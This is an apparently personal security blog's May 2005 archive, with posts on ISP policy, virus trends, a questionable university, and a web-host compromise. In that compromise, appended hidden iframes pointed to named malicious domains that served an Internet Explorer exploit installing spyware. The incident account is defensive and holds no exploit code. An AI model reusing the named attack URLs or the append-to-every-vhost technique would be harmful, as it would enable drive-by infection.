General: May 2005 Archives
An article over at Slicon.com takes a look at that old concept of requiring a license to use the internet.
Just as corporate and university networks have taken steps to implement access control to keep out infected systems so too should ISPs look at banning machines that don't meet a defined security regime.
The article goes on to draw parallels to drivers licenses, restaurants known to service food that makes you ill, and bad neighbors. If you can call the cops to do something about that why cant you ban bad Internet neighbors!
In the U.S. the vast majority of Internet service providers are trying to make a buck. Why would they refuse service to these cyberslackers who quickly become spam-bots because of their inability to patch. Banks do it all the time. They refuse to open accounts for people known to bounce checks. A few bucks up front for the account isn't worth the trouble that will come down the pipe. Unfortunately this analogy has been largely lost on ISPs.
Many ISPs have pink-list contracts. Contracts where spammers pay a PREMIUM and may hang around until the anti-spammers complain too much. Historically many ISPs have not been good caretakers of their portion of the network. They are in for the fast buck. They are more than willing to let Ma and Pa Kettle onto the Internet without a personal firewall, without adequate patching and without adequate antivirus. AOL and Earthlink run commercials saying they are different. They are able to sell security to the user by selling usability brought by security devices blocking spam and spyware. But how many of AOLs customers actually have the AOL Security Edition?
I'm reading The Art of Deception by Kevin Mitnick. I would suspect that it will be the basis of more than a few blogs going into the future. I really don't like Mitnick but was convinced to pick up his book. From what I've read so far, he defends himself with the classic lines of 'I didn't intend to do any harm', 'I didnt know what I was doing was wrong', and 'I was just curious'.
Oh well. The discussion for the place of criminals as security experts is one for another day. I intended this post to be about preparation. Mitnick reports that he practiced and honed his trade. It reminded me of a Dateline episode I saw where gangs would get together and study war, psychology, law etc. The bad guys is always seeking to perfect his craft. As sysadmins and security professionals we need to be seeking to perfect our craft also. The more we get caught up in the tyranny of the now, the less we develop our own skill set and develop our corporate defenses.
JD comments about Kaspersky Labs forecast that global virus outbreaks are waning. My comments here are a reply to that.
I suspect that mass mailing viruses will be seen in the leet community like denial of service attacks. A pedestrian form of attack not worthy of anyone with skillz. That does mean they will completely disappear? No. There will always be some dope willing to do it.
The big lesson here is dont get caught fighting last years war. If you're all confident in your smtp antivirus defenses it may be time to reexamine them.
Will attacks targeted at specific companies further reduce the role of definition based antivirus? Actually this is nothing new. I know of a company where the CEO is known to have received two different keystroke loggers by opening a .mdb file sent to him. That kind of targeted virus was tough to stop then by definition based antivirus and it will be a problem in the future unless more and more behavioral and heuistic tests are employed.
Ben Goodger lead engineer for Mozilla Firefox lobbed a grenade or two at Netscape 8 insecurity in his latest blog entry from May 19th.
I've been wondering about what the University of Fairfax is. Diploma Mill or what. They've been sponsoring some CISSP study sessions locally and some CISSP webcasts that I watched. They offer a PhD in Information Systems concentrating in Information Assurance.
While the website did look like it is a real program rather than a diploma mill program, I was suspicious having not heard of them before. The next item that raised my suspicions was the statement "The University of Fairfax is certified by the State Council of Higher Education for Virginia to operate in the Commonwealth of Virginia." When I looked at that State website it appeared more to be a registration of higher education programs rather than any endorsement or accreditation of the curriculum.
Next a quick google led to an AP story posted at WTOP. Apparently the guy running this school is banned from heading schools in Maryland because a school he lead shut down abruptly in the 90s leaving students and the government in the lurch. Not only that, but two men listed as faculty on the University of Fairfax web site told reporters they never taught a course there!
I found a Washington Post article that goes into some detail.
Makes me worry now about (ISC)^2. They are currently engaging in joint marketing with the University of Fairfax. Basically they are giving their name and reputation to this guy. What do they say about it. Marc Thompson, VP at (ISC)^2 says Berlin's "heart is in the right place" in spite of his checkered past. That's right taking millions to offer education courses and then folding up shop is just a mistake and shouldn't preclude you from offering more education courses in the future according to (ISC)^2.
I can't conclude that this is a diploma mill. But it sure seems shady. Whether looking for training or returning to school you need to verify the accreditation of the school and its instructors.
Netscape 8.0 was replaced by 8.0.1 hours after its release as several vulnerabilities were found. The vulnerabilities would reportedly allow a an attacker to attack arbitrary code if the user went to the attackers malicious site. What is really sad is it appears that these are known vulnerabilities in the Gecko engine that Firefox patched on May 6th.
Netscape requires a uninstall to be able to install a non-vulnerable version.
Two guys are walking in the woods and they come upon a big bear. The bear sees them as food and creeps toward them. the first guy starts to slowly tip-toe away, but the second guy takes off his hiking boots and pulls out his running shows. The first guy says, "You can't outrun that bear!" The second guys says, "I don't have to outrun the bear, I just have to outrun you!"
This illustration is often used to show that you dont have to have perfect security. True, perfect security is an illusion. But what does it matterr if my security is better than my neighbors?
Lets think of two common types of attacks. One is the network worm. It doesn't care whose network its on. It doesn't know my network is more secure or less secure than my neighbors. If I am vulnerable to the threat, I am hosed.
In another type of attack, I may be specifically targeted. Again, the attacker doesn't care about my relative security. He is specifcally after me.
This isn't like home security where a burgler will move on to the unattended home. Companies need to take steps to secure their network based on their business impact analysis. The only time being "faster than the bear" will help is when you are trying to prove due diligence.
Apparently I've got to start watching 24.
Back in April 24 had hilariously bad dialog involving blowfish.
Now they had a huge product placement for Cisco right in the middle of the show.
Chloe: How did this happen? Mr. Buchanan, the network security monitor lit up. Someone on the outside is trying to jam our satellite servers.
Buchanan: Could this just be high network load?
Chloe: No, it's definitely a denial of service attempt. What do you want me to do?
Buchanan: Did it do any damage yet?
Chloe: No, the Cisco system is self defending.
You can go see the clip on cisco's site.
Personally I think product placements in shows are great when they aren't horribly out of place. I did have to laugh though at the use of Cisco's self defending network marketing line. While the concept they espouse is interesting, they may get in trouble one day for a little thing called truth in advertising.
Rick Rescorla was the Security Head for Morgan Stanley at the World Trade Center. His is one story that cannot be told often enough.
After the 1993 truck bombing at the WTC, he drilled the employees of Morgan Stanley with emergency evacuation procedures. Because of this preparedness and his call for to evacuate on 9/11/01 everyone in Morgan Stanley made it out but for himself and two of his staff. Unfortunately emergency evacuation procedures call for making sure everyone else gets out first. Rick died when the tower he was in collapsed as he performed his duties doing a floor by floor search for stragglers.
I just found out that Amazon has a book on his life Heart of a Soldier. I cant wait to get it.
Rather than do a further recap of Rick's life, here are some links. If you can keep a dry eye while reading that you are much tougher than I am.
http://www.mudvillegazette.com/archives/000307.html
http://www.post44.org/misc/rescorla.html
http://www.newyorker.com/fact/content/?020211fa_FACT1
Do you subscribe to any security magazines? There is CSO, Information Security Magazine, and SC Magazine. There are probably others I haven't thought of.
All you need to do is provide some information. What is your security budget. What is your purchasing authority. What types of products do you plan to buy over the next 6 months. Give away some information and get a free magazine.
Kind of ironic that security magazines would rely on information disclosure as a core part of their business model. I can live with that since the information is so generic. The problem is when they keep asking me to fill out the form to resubscribe after I've already done it. I just had a "Barbara" from SC Mag hang up on me when I told her I had already resubscribed twice and asked how many times I needed to resubscribe before I they stop asking me to do it.
Gene Kim, the CTO of Tripwire did a study of hundreds of organizations in late 2002 and early 2003. He found that many organizations were struggling with patch management and with system administrator to server ratios of 1 administrator to 5 or 6 servers. Other organizations were humming along with ratios that had one administrator to a hundred servers. The 1:100 organization had strong security. The difference he found between the organizations is policy and controls in place.
The tripwire website has an article goes along with this. What is needed is a prevailing culture of change management, rigorous configuration management practices, and a heavy reliance on release management.
At work, there is an initiative to implement IT Service Management. Administrators have responded with reticence. There are fears that the sys admins job will be nothing more than updating knowledge base articles and disaster recovery plans. The feeling is that System Administration is a dark art rather than a science. From the reports of Gene Kim it sounds like there is a lot of improvement if the process can be implemented correctly.
You wouldn't build a house and then add electricity after the fact. It would end up costing you much more. You would need to rip out the walls to install the wiring. The inspections done by the local authoriites need to take place as the building is going up to insure that the installation is safe.
The same is true for security in the projects at work. Security is most effective when planned and implemented throughout the entire lifecycle.
I got back from a mother's day trip, and I see that tgp.la's registrar has given them the kaibosh.
http://whois.dotregistrar.com/drs/wwwhois.pl?domain=tgp&tld=.LA&Check=Check
Status:PENDING DELETE RESTORABLE
Status:HOLD
Also the glue records that were in place on the root servers is gone. I dont want to be premature here, but I think we've stopped the tgp.la hijack. :)
I suspect the hacker's next step will be to attempt to remodify all the home pages on powweb. With tgp.la offline and unlikely to return, they'll need a new domain for a new attack.
Tgp.la was offline last night. I assume that someone got to the bad guys webhost and had him termed for abuse. By this morning the site was online and pointing to a new IP address. These bad guys are experienced at playing wack-a-mole. If you take out one site, he's ready to pop up in a new location.
I contacted the new webhost (still no word from them) as well the bad guys dynamic dns provider everydns. everyDNS responded before I returned from lunch. They have pulled the guys dns and redirected it to a "termed for abuse" webpage. So I've got one confirmed kill thus far. :)
The problem is that doesn't slow him down much. The guy just goes to his registrar and change authorized dns servers. So I've contacted the guys registrar to see if we can terminate the domain itself for abuse. That will prevent any further exploitation on these sites with the iframe pointing to tgp.la. Of course, the bad guy will then register a new domain, but he will have to start from scratch. Since no one has figured out how this was done in the first place, we'll probably find all the sites infected again with the new url.
This is part 2, it may make more sense if you start with part one, posted earlier.
Chris Mosby is a fellow moderator over at myitforum.com, and his blog (which I joke about it being a mirror of the SANS ISC) has provided a clue as to what is going on. Not being familiar with Apache I wasn't sure exactly how an attacker would compromise all websites on a server and add a footer. Chris has posted a SANS Internet Storm Center report from March showing that an attacker if they compromise the server just needs to look in httpd.conf to get a list of the virtual sites. Then it is just a matter of appending exploit code to each of those virtual sites.
What's funny is that although I read Chris's blog daily and read the SANS blog daily, I didn't remember this. A fellow user at powweb did a search and found his article.
Next I went to MSN Search to find sites that link to www.tgp.la/or.html. Google would not find any results for me. I guess they dont include links inside an iframe tag. MSN Search found over 1000 compromised sites. All at PowWeb. It really starts to look like my provider got compromised. Not me.
Hopefully people reading this now understand that you dont get infected by surfing to the seamy underbelly of the web. Not anymore. Its the sites you go to everyday. So you need to stay vigilant. Stay patched. Stay up to date on your antivirus.l
The fun continues over at POWWeb. A bunch of us have noticed that the home page has been appended (at the bottom) with an IFRAME calling http://www.tgp.la/or.html. The file change occurred at 20050503 21:34 (-0700).
The tgp.la page is loaded as a webbug (0by 0 in size) on my homepage. When examine what www.tgp.la/or.html does, I see that it loads via another iframe http://www.realizeit.biz/v058/wow.html. That html page uses an old Internet Explorer exploit to install some spyware known as Trojan.Desktophijack. Some antivirus already catches it. Symantec wasn't catching it so I submitted the file to Symantec. They responded that it is a virus and they will be adding it to the definitions. Hopefully it make it into the liveupdate due out today.
The question with incident handling is how did it happen. With the 404 redirect problem at powweb that I reported before, it was fairly easy to prove that this was a powweb problem (although they never admitted it). In this case it is much more difficult to prove. The POWWeb fanboys are pointing a finger at the applications we are using (phpnuke, movable type, gallery, phpbb, awstats, etc). Then there is also the potential for the FTP password being guessed.
There is not one vulnerable package that we all run. I suppose it could be a hybrid worm looking for several vulnerabilities. But I think I would see something like that in my http logs. I've reviewed the logs and see nothing of the sort. That leaves me wondering if my web provider powweb hasn't screwed up again like they did with the 404 error page problem. Until we figure out what is wrong there is no way to guarantee that an attacker will not be able to update my page again!
VNUnet.com interviewed Nick Ray, chief executive, Prevx a company providing HIPS software.
As you might expect from a HIPS vendor, he argues that patching cannot occur quickly enough to provide detection. Antivirus is outmatched and uses an outdated reaction oriented update model.
"Hips in theory should require no patches, no signature updates and no rules to work because it identifies the characteristics of the attack behavior and stops the action taking place."
"A security guard trained to recognize the faces of wanted criminals is of no use if he fails to spot a masked man breaking in."
Another week another story about lost backup tapes.
The Washington Post reports that a Time Warner backup tape containing information on 600,000 current and former employees was lost during transport by their data storage company, Iron Mountain.
I'm sure that most of these stories about missing tapes are a result of poor procedures and record keeping and that the tapes aren't in the hands of a data thief. I just don't think its a good idea to take that risk anymore. Backup administrators should demand that their backup software include encryption with appropriate key management.
Security Focus has an article on the danger of backup tapes which has been a hot button issue for me over the past few months.
The author points out that you take the lowest paid guy in the I.T department (commonly known as a tape jockey) and place a backup tape with the entirety of the corporate data in his hands. If your company name is AOL or Ameritrade, or Bank of America you know what kind of trouble that can cause.
